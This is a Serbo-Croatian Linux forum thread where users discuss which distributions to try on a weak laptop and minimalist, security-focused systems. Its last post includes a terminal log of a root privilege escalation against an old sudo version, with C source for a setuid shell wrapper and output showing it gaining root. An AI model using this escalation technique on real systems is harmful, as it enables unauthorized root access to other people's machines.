Linux Distribucije

Hempatia Soma iGrow Hemps garden

sale82ful

Drug Član
Poznanik Foruma
18.12.2013
2.641
10.741
358
Ne znam zasto, ali wine mi nikad nije odradio posao bar u mojem slucaju. U sustini, ja imam jako slab racunar, (neki acerov chromebook) osim sto sam iz njega izbacio fabricki HDD i ubacio SSD od 80 gb, Zato velim da nemam gdje sa bekapom podataka. A na taj hard bi da nabacim neke distre, jer pocetnik sam u linux svijetu, pa bi malo da se poigram sa distrama, da se ucim a da ne diram ovaj Mint sto mi je na ovom Book-u. Nadam se da kontas sta hocu reci.
 
25.10.2016
50
49
18
53
:rasta:

Da, kontam....pitam se što bih ja učinio na tvojem mjestu.!?..problem je slab PC, premalo memorije, spor procesor itd.itd....kažeš da si izbacio originalni HDD od 500 GB! pa, upravo, njega možeš koristiti za navedene stvari. njega podijeli na nekoliko particija, na nekima neka ti ostane postojeće, na drugima napravi backup tih podataka, što možeš unutar Minta (ili neke app predviđene za to, a ima ih prilično) i jednu ili više njih(pretraži net - koje aplikacije bi bile korisne za Mint- u tvojem slučaju) iskoristi za instalaciju drugih Linuxa koje želiš....fat32 je sustav koji Linuxi prepoznaju bez problema, tako da samo izabereš koje Linuxe želiš, i ostalo će oni odraditi prilikom instalacije...moje preporuke su: ubuntu, fedora i Q4, jer nisu preteški i odlični su za ljude koji tek počinju savladavati način na koji Linuxi funkcioniraju...ostali su teži i kompliciraniji, a neki su toliko komplicirani da i dobrim poznavateljima Linuxa, treba vremena da polove sve stvari....
nakon što malo više upoznaš svijet Linuxa, tada ćeš se sjetiti raznoraznih mogućnosti, koje ćeš moći bez problema sam napraviti....npr. kada uspiješ nabaviti noviji komp. tada možeš napraviti kloniranje diska [znači, dobiješ potpuno identičnu kopiju diska, sa svim postavkama, sa svim vizualnim efektima koje imaš i sa svim programima koji rade i izgledaju kao i raniji - tada klonirani disk i samo ih prebaciš na drugi HDD i imaš sve potpuno isto i potpuno funkcionalno...a imaš i mogućnost instaliranja virtual box-a - programa koji omogućuje da više OS radi istovremeno na jednoj particiji..{mislim da bi to zapravo bila najbolja opcija za tebe, ali problem je preslab PC}.sve su to mogućnosti + gomilu drugih kojih ćeš se sjetiti kada malo svladaš Linuxe...moj savjet ti je; koju god distribuciju izabrao, budi; strpljiv, uči na greškama, korak po korak, čitaj turorijale i uputstva, probaj ih sam napraviti, i tako ćeš malo po malo svladati materiju...a s vremenom, ovisno o tvojoj želji, volji, upornosti i/ili potrebama, u smislu napredovanja, samo je nebo granica!
Ja sam koristio Ubuntu i nješto manje Q4, nekoliko godina, a onda sam iz određenih razloga prestao, i ostao na Windowsima, tako da mi je dosta toga izbrisano iz pamćenja, ali generalno poznajem materiju...
Znači, možeš sve to napraviti, na relativno siguran i zadovoljavajući način, a prije toga malo pretraži net i informiraj se o mogućnostima, mogućim problemima, mogućim rješenjima i slično.
Upravo sam htio završiti, a onda sam se sjetio jednog načina, koji bi ti zapravo bio u trenutnoj situaciji optimalan...pretpostavljam da imaš dvd-rom na tom chromebooku, što je prednost, jer svaku od ovih navedenih Linux distribucija možeš instalirati kao .iso datoteku na dvd ili na USB stick...a to znači da onda imaš ubuntu na dvd-u ili USB sticku, fedoru na dvd-u ili USB Sticku ili nešto treće na dvd-u ili USB Sticku...i po potrebi, kad želiš koristiti neki od tih Linuxa restartaš komp i dižeš sustav koji hoćeš sa dvd-a ili USB-a....
zapravo, trenutno bi to bila najbolja opcija, po meni...
sretno...
 
Poslednja izmena od urednika:
  • Sviđa mi se
Reactions: sale82ful

sale82ful

Drug Član
Poznanik Foruma
18.12.2013
2.641
10.741
358
pretpostavljam da imaš dvd-rom na tom chromebooku
Upravo to, nemam ga... Drugacije bi ja pristupio... Imam usb, ali, ne bih isao na live, jer u tom slucaju kad izvadim usb sve radnje se ponistavaju. Zato hocu da bas bude instalacija. Nisam ja bas ni noob u racunarskom svijetu. Poznajem materiju, samo treba mi malo neke nedoumce otkloniti, tj da se naviknem na funkcionalnost OS na svaki od njih. I da izaberem sta mi najvise odgovara. :D

Svakako, slazem se da mi treba jaci komp... ali, sila prilika, nisam u mogucnosti, da ne objasnjavam sad kako i zasto, to je vec neka druga tema. (hard sam prodao sto je bio u ovom book-u) tako da njega zaboravi.

Tebi hvala na strpljenju... a kad zapnem negdje, javicu se opet u ovoj temi. Mnoge nedoumice si mi otklonio, pa cu dalje, korak po korak. Hvala jos jednom.
 
25.10.2016
50
49
18
53
..nemaš problema...naravno da nisu svi u mogućnosti samo tako drugi dan kupiti novi komp....nisam ni ja.
onda isprobaj neku od navedenih opcija, probaj ubuntu, za njega ti je dovoljno 50-ak GB....dalje ćeš vidjeti, u kojem smjeru se stvari razvijaju....
a kad budeš trebao, javi se....
:thumb:
 
Poslednja izmena od urednika:
  • Sviđa mi se
Reactions: sale82ful
22.10.2017
23
41
13
25
Bavim se programiranjem dosta pogotovo web design..

Po meni mislim da windows je laksi mnogo i moze da zavrsi posao u web development vodama ipak kako kome odgovara ali Linux je dosta dobar za network menadzment (barem po meni)
Koristim Kali Linux posto stalno "napadam" svoje servere i pokusavam da presretnem data eto da vidim koliko dobro mi je server zasticen.
A CentOS za servere i njihov menadzment ali ipak Linux je mocan OS
 

Smak420

Aktivan Član
03.10.2013
1.135
4.797
188
somwhere over the rainbow
Zwar7Mp.jpg
 

Prater

Prijatelj Foruma
04.04.2012
208
639
93
koristim linux neko vrijeme, ali moram priznat da me velika vecina distribucija smorila.

kernel je postao prenatrpan, a odrzavanje vlastite kernel konfiguracije za raznoliki hardware zahtjeva odvajanje odredjene kolicine vremena, truda ali i dobru organizaciju. smatram da se ne isplati osim ako se ne radi o masovnom deploymentu, zanimaciji i ucenju ili o nekoj veoma bitnoj masini koja mora biti maksimalno osigurana.

ne volim obavezu kada treba napraviti major upgrade na novi release. to znaci downtime i mogucnost da upgrade nece proci kako treba. dvije masine jos uvijek vrte CentOS 6 koji je odavno end-of-life. naravno neda mi se radit upgrade.

zanima me sigurnost, stoga mi je prenatrpani kernel poceo smetat, a konfiguracija svakih malo oduzimati previse vremena. uz to na sistemu ne zelim imati alate/procese/pakete za koje ne znam sta rade.

kao inicijalno rjesenje za svoj problem sam nasao linux distribuciju CRUX. minimalisticka, unix-like distra na kojoj skoro sve morate radit rucno, ukljucujuci buildanje kernela, dependencya i paketa. obuzet minimalizmom i sigurnosti prelazim na BSD, ocaran istovremeno jednostavnosti i kompleksnosti ostajem na njemu dvije godine, ali primjecujem pad produktivnosti. razlika ulozenog vremena i truda naspram linuxa da se dobije zeljeno je prevelika (kako za sta). za to vrijeme sam na BSD naucio jako puno. i dalje ga vrtim na dva RPI uredaja 24/7 i jednom laptopu.

naisao sam na jednu rolling distru Void, koja omogucava buildanje svojih paketa iz templatea ali i koristenje gotovih paketa. takodjer sadrzi dosta security related paketa. sa ovom distrom sam takodjer rjesio problem obaveze major upgradea na novi release jer se radi o rolling distri.

ipak razmisljam preci nazad na CRUX za glavni workstation jer zelim imati vise kontrole nad sistemom, a to mogu dobiti samo ako ju dobro osiguram, sve buildam i ne koristim pakete.

https://crux.nu/
https://netbsd.org/
https://voidlinux.org/

edit: da nadodam jednu stvar. po meni vecina linux distri je radjena na isti kalup, mjenjaju se kernel konfiguracije, package manager, userland i konfe, desktop environment, tim koji radi na distribuciji i targeted platforma (desktop/server/embedded/mobile/...). tako je barem u siroj slici vecine korisnika. hocu reci da su mi te modifikacije postale nebitne jer niti jedna distra mi ne zadovoljava sve potrebe. takodjer iz razloga sto aktivno koristim mali broj alata, jednostavnije mi je uzeti neku minimalisticku distru i konfigurirati sto i kako mi treba. kod servera mi je bitan update stoga tu biram distru koja ima prebuilt pakete.

incident.png


^ ne koristim sudo niti doas jer otvaraju previse mogucih sigurnosnih problema, a 'su -' je i vise nego dovoljan u vecini slucajeva.

evo jedan log testiranja od prije par tjedana - mislim da je bila centos masina, drugaru se isto kao i meni neda radit upgrade, zato postoje odredjene posljedice. :)

Kod:
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3

$ cat /tmp/su.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
        setresuid(0,0,0);
        execl("/bin/sh", "sh", "-c", argv[1], (char *) NULL);
}

$ gcc /tmp/su.c -o /tmp/su

$ whoami
data

$ ls -la /tmp/su
-rwxr-xr-x 1 data data 6623 Mar 22 11:53 /tmp/su

$ /tmp/su whoami
data

$ python e.py
command size: 0x1370
offset to defaults: 0x0
success at 40

$ ls -la /tmp/su
-rwsr-xr-x 1 root root 6623 Mar 22 11:53 /tmp/su

$ /tmp/su whoami
root
 
Poslednja izmena: